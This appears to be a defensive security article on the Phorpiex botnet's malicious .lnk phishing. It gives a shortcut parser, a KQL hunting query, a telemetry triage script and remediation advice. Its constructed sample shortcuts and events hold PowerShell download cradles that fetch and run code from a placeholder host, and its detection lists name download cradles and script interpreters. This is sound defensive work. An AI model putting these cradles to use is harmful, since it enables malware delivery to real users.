Defending Against Phorpiex: How to Detect Malicious .LNK Files and PowerShell Attacks
Introduction
Security operations centers (SOCs) are currently tracking a high-volume social engineering campaign leveraging the notorious Phorpiex botnet (also known as Trik). Unlike sophisticated exploits targeting zero-day vulnerabilities, this campaign relies on abusing standard Windows functionality—the Windows Shortcut (.lnk) file—to deliver its payload.
Attackers distribute these files by mass email, typically disguised as invoices or shipping notices. A shortcut is a native Windows file type rather than an executable by extension, so basic attachment filters that key on .exe and script extensions may let it through, and a user who opens it is really running whatever command the shortcut stores, in this case a PowerShell script that downloads the malware. For defenders, this underscores the enduring risk of social engineering and the need for strict controls around file execution and PowerShell usage.
Technical Analysis
The attack vector begins with a phishing email carrying an attachment that looks like a document (e.g., Invoice.doc.lnk). Windows Explorer never displays the .lnk extension, even when "Hide extensions for known file types" is turned off, so the user sees Invoice.doc with whatever icon the shortcut specifies. Double-clicking it does not open a document: the shortcut's target is a script interpreter, and its stored argument string launches PowerShell with the concealed command.
- Initial Access: The user interacts with the malicious .lnk attachment.
- Execution: The shortcut triggers a PowerShell command, often passed through -EncodedCommand (base64 of UTF-16LE text) with a hidden window so that simple string matching on the command line fails and the user sees nothing happen.
- Payload Delivery: The PowerShell script reaches out to a remote command-and-control (C2) server to download the Phorpiex payload (a DLL or executable).
- Impact: Once installed, Phorpiex acts as a botnet client, capable of dropping additional malware, such as ransomware (e.g., "Global Group" encryption variants mentioned in recent reports), or engaging in cryptojacking.
This technique is effective because it is "low-noise": it lives off the land, abusing native tools rather than deploying custom exploit code, so signature-based antivirus has little to match on and the behaviour is only caught by heuristics such as parent-child process rules and script logging.
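The concealed command can be read straight out of the shortcut without launching it, because the Shell Link format stores the target, arguments and icon as plain fields. The following Python is an added example, not code from the article or from any Phorpiex sample: it builds a minimal .lnk in memory shaped like the lure described above (Word icon, PowerShell target, minimized window, download cradle in the arguments) and parses it back. Offsets and flag bits follow the public MS-SHLLINK specification; the paths, the example.invalid URL and the cp1252 assumption for non-Unicode strings are placeholders chosen for the example. Real samples usually put the target in the LinkTargetIDList or LinkInfo structures, which this parser skips by size, so on those files the relative_path field may be empty and the arguments are the field to read.

```python
"""Offline inspection of a Windows shortcut (MS-SHLLINK binary format). Added example."""
import struct
import uuid

LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
# LinkFlags bits from the ShellLinkHeader
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7   # 7: window opens minimized, the user sees nothing
# StringData sections appear in this fixed order, each present only if its flag is set
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location"))
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32")
DOC_ICON_HINTS = ("winword", "excel", "powerpnt", "acrord", "wordpad")


def _string_data(text: str) -> bytes:
    """CountCharacters (uint16) followed by UTF-16LE characters, no terminator."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path: str, arguments: str, icon_location: str,
              show_command: int = SW_SHOWNORMAL) -> bytes:
    """Minimal shortcut: 76-byte header, three StringData sections, terminal ExtraData block."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID.bytes_le, flags,
                         0,            # FileAttributes
                         0, 0, 0,      # Creation/Access/Write FILETIME
                         0, 0,         # FileSize, IconIndex
                         show_command,
                         0, 0, 0, 0)   # HotKey, Reserved1, Reserved2, Reserved3
    return (header + _string_data(relative_path) + _string_data(arguments)
            + _string_data(icon_location) + struct.pack("<I", 0))


def is_lnk(data: bytes) -> bool:
    """HeaderSize must be 0x4C and LinkCLSID must be the shell-link class."""
    return (len(data) >= 0x4C and struct.unpack_from("<I", data)[0] == 0x4C
            and uuid.UUID(bytes_le=bytes(data[4:20])) == LINK_CLSID)


def parse_lnk(data: bytes) -> dict:
    """Read the header and StringData; the ID list and LinkInfo are skipped by their sizes."""
    if not is_lnk(data):
        raise ValueError("not a shell link")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    pos = 0x4C
    if flags & HAS_ID_LIST:                       # IDListSize (uint16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_command}
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        size = count * 2 if unicode else count
        raw = bytes(data[pos:pos + size])
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")  # cp1252 assumed
        pos += size
    return fields


def lnk_indicators(fields: dict) -> list:
    """Reasons a parsed shortcut looks like a document-masquerading loader."""
    reasons = []
    target = fields.get("relative_path", "").lower()
    icon = fields.get("icon_location", "").lower()
    args = fields.get("arguments", "").lower()
    if any(i in target for i in INTERPRETERS):
        reasons.append("target is a script interpreter")
    if any(h in icon for h in DOC_ICON_HINTS):
        reasons.append("icon borrowed from a document application")
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("window starts minimized")
    if "http://" in args or "https://" in args:
        reasons.append("arguments contain a URL")
    return reasons


# Constructed samples, not real files: the lure, and an ordinary application shortcut
LURE = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments="-w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/a')\"",
    icon_location=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN = build_lnk(relative_path=r"..\..\Program Files\7-Zip\7zFM.exe", arguments="", icon_location="")

if __name__ == "__main__":
    for label, blob in (("lure", LURE), ("benign", BENIGN)):
        parsed = parse_lnk(blob)
        print(label, parsed["relative_path"], parsed["arguments"], lnk_indicators(parsed))
```

To triage a quarantined attachment, read the file's bytes and pass them to parse_lnk; the arguments field is the command the user would have run, and lnk_indicators gives the same four checks an analyst applies by eye.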
Defensive Monitoring
To detect this activity, security teams should monitor for unusual parent-child process relationships, specifically explorer.exe spawning PowerShell (or cmd.exe, wscript.exe and other script interpreters) with encoded or hidden-window arguments; for the creation of .lnk files in suspicious locations such as user Downloads folders and Outlook's temporary attachment folder; and for PowerShell script block logs (Event ID 4104), which record the decoded script even when the command line was base64-encoded.
Microsoft Sentinel / Defender KQL Query
This query looks for PowerShell processes started by Explorer (the shell that handles .lnk files), directly or through an intermediate cmd.exe, with characteristics common to Phorpiex campaigns: an encoded command, a hidden window style, or a download cradle on the command line.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
// A double-clicked .lnk is launched by the shell, so Explorer is the parent; some shortcuts
// point at cmd.exe instead, which then starts PowerShell (Explorer > cmd.exe > powershell.exe)
| where InitiatingProcessFileName =~ "explorer.exe"
    or (InitiatingProcessFileName =~ "cmd.exe" and InitiatingProcessParentFileName =~ "explorer.exe")
// Flags abused in these campaigns: encoded payload (-e, -ec, -enc, -EncodedCommand are all accepted),
// hidden window (-w hidden or -WindowStyle Hidden), or a download cradle
| where ProcessCommandLine matches regex @"(?i)\s-e(c|nc|ncodedcommand)?\s"
    or ProcessCommandLine matches regex @"(?i)\s-w(indowstyle)?\s+hidden"
    or ProcessCommandLine has_any ("DownloadString", "DownloadFile", "Invoke-WebRequest", "Net.WebClient")
// Pull out the base64 blob; it decodes to UTF-16LE text, so decode it as such before reading it
| extend EncodedCommand = extract(@"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", 1, ProcessCommandLine)
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
    InitiatingProcessFileName, InitiatingProcessCommandLine, EncodedCommand
| top 100 by Timestamp desc
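The query surfaces the encoded blob but leaves decoding to the analyst. The Python below is an added example, not code from the article: it applies the same heuristic to a few constructed events whose field names mirror Defender's DeviceProcessEvents (the events, hostnames and the example.invalid URL are made up for the example) and adds the decoding step, which matters because the DownloadString that the raw command line hides only appears in the decoded UTF-16LE text.

```python
"""Triage of process-creation telemetry for shortcut-launched PowerShell. Added example."""
import base64
import re
from typing import Optional

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe
ENC_FLAG = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG = re.compile(r"\s-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_TERMS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "net.webclient")
INTERPRETERS = {"powershell.exe", "pwsh.exe"}


def encode_command(text: str) -> str:
    """Encode text the way -EncodedCommand expects (used here only to build the sample)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def shell_launched(event: dict) -> bool:
    """True when Explorer started the process directly, or started the cmd.exe that did."""
    parent = event.get("InitiatingProcessFileName", "").lower()
    grandparent = event.get("InitiatingProcessParentFileName", "").lower()
    return parent == "explorer.exe" or (parent == "cmd.exe" and grandparent == "explorer.exe")


def triage(event: dict) -> dict:
    """Score one event: the reasons it matched and the decoded payload, if any."""
    reasons = []
    cmd = event.get("ProcessCommandLine", "")
    if event.get("FileName", "").lower() in INTERPRETERS and shell_launched(event):
        reasons.append("interpreter launched from the shell")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    if HIDDEN_FLAG.search(cmd):
        reasons.append("hidden window")
    # Search the decoded text too: that is where an encoded cradle keeps its DownloadString
    haystack = (cmd + " " + (decoded or "")).lower()
    if any(term in haystack for term in DOWNLOAD_TERMS):
        reasons.append("download cradle")
    # Same shape as the KQL query: shell-launch context plus at least one command-line indicator
    suspicious = "interpreter launched from the shell" in reasons and len(reasons) >= 2
    return {"suspicious": suspicious, "reasons": reasons, "decoded": decoded}


# Constructed sample events, not real telemetry; example.invalid is a placeholder host
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    {   # shortcut double-clicked in Explorer: encoded command, hidden window
        "DeviceName": "ws01", "AccountName": "jdoe", "FileName": "powershell.exe",
        "InitiatingProcessFileName": "explorer.exe", "InitiatingProcessParentFileName": "userinit.exe",
        "ProcessCommandLine": "powershell.exe -w hidden -ep bypass -enc " + encode_command(PAYLOAD),
    },
    {   # shortcut whose target is cmd.exe, which then starts PowerShell
        "DeviceName": "ws02", "AccountName": "asmith", "FileName": "powershell.exe",
        "InitiatingProcessFileName": "cmd.exe", "InitiatingProcessParentFileName": "explorer.exe",
        "ProcessCommandLine": 'powershell.exe -nop -WindowStyle Hidden -c "iwr http://example.invalid/p.exe -OutFile $env:TEMP\\p.exe"',
    },
    {   # scheduled-task PowerShell with no indicators: must not fire
        "DeviceName": "ws03", "AccountName": "SYSTEM", "FileName": "powershell.exe",
        "InitiatingProcessFileName": "svchost.exe", "InitiatingProcessParentFileName": "services.exe",
        "ProcessCommandLine": "powershell.exe -File C:\\Scripts\\inventory.ps1",
    },
]


def main() -> None:
    for event in SAMPLE_EVENTS:
        verdict = triage(event)
        print(event["DeviceName"], verdict["suspicious"], verdict["reasons"], verdict["decoded"])


if __name__ == "__main__":
    main()
```

The third event shows why the shell-launch context is required: PowerShell run by a scheduled task with a plain -File argument is everyday administration and produces no alert, while the same flags under explorer.exe do.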
PowerShell Audit Script
Use this script on endpoints to list .lnk files created or modified in the last 24 hours in each user's Downloads folder, where shortcuts are rare in business contexts unless specifically required, and to show where each shortcut points. Reading a shortcut's target and arguments through the WScript.Shell COM object loads the file but does not execute it.
# Scan each user's Downloads folder for .lnk files created or modified in the last 24 hours
# and show where each shortcut points (reading the shortcut does not run it)
$TimeThreshold = (Get-Date).AddDays(-1)
$Shell = New-Object -ComObject WScript.Shell
$Users = Get-ChildItem (Join-Path $env:SystemDrive "Users") -Directory
foreach ($User in $Users) {
    $DownloadPath = Join-Path -Path $User.FullName -ChildPath "Downloads"
    if (-not (Test-Path $DownloadPath)) { continue }
    $LnkFiles = Get-ChildItem -Path $DownloadPath -Filter "*.lnk" -File -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt $TimeThreshold -or $_.CreationTime -gt $TimeThreshold }
    if ($LnkFiles) {
        Write-Host "Suspicious LNK files found for user: $($User.Name)" -ForegroundColor Yellow
        $LnkFiles | ForEach-Object {
            $Link = $Shell.CreateShortcut($_.FullName)
            [PSCustomObject]@{
                Path      = $_.FullName
                Created   = $_.CreationTime
                Target    = $Link.TargetPath
                Arguments = $Link.Arguments
            }
        } | Format-Table -AutoSize -Wrap
    }
}
Remediation
To protect your organization from Phorpiex and similar .lnk-based attacks, implement the following defensive measures:
- Email Filtering: Configure your Secure Email Gateway (SEG) to block or quarantine attachments with the .lnk extension, and apply the same rule to shortcuts inside archive attachments rather than only to bare .lnk files. Legitimate external email carrying a Windows shortcut is rare enough to justify a block-and-quarantine policy.
- Attack Surface Reduction (ASR) Rules: Enable the Microsoft Defender ASR rules "Block execution of potentially obfuscated scripts" and "Block executable files from running unless they meet a prevalence, age, or trusted list criterion"; the first targets the PowerShell stage, the second the downloaded payload. "Block Office applications from creating child processes" does not cover this chain, because the shortcut is launched by Explorer rather than by an Office application; it only helps if a later stage drops a macro document. The rules can be set with Add-MpPreference or through Intune, and should be run in audit mode first to find legitimate scripts that would be blocked.
- PowerShell Constrained Language Mode: Enforce Constrained Language Mode for standard users through WDAC or AppLocker; setting the __PSLockdownPolicy environment variable alone is easily bypassed. CLM blocks New-Object on arbitrary .NET and COM types and Add-Type, which breaks Net.WebClient download cradles, but built-in cmdlets such as Invoke-WebRequest still run, so it limits rather than stops payload delivery. Pair it with script block logging (Event ID 4104) and remove the PowerShell 2.0 engine, which attackers invoke to downgrade out of these controls.
- User Awareness: Update your security awareness training to specifically warn against file icon masquerading. Explorer never shows the .lnk extension, so hovering over Invoice.doc.lnk or enabling extensions will not reveal it. Teach users to look for the shortcut arrow overlay on the icon and, in Explorer's Details view, a Type column reading "Shortcut" rather than "Microsoft Word Document", and to treat any emailed "document" that is really a shortcut as malicious.
- Patch and Update: Ensure all endpoints are fully patched. This campaign needs no exploit to gain execution, but Phorpiex has been reported to attempt older vulnerabilities for privilege escalation once it is running, so current patches limit what a successful initial infection can do.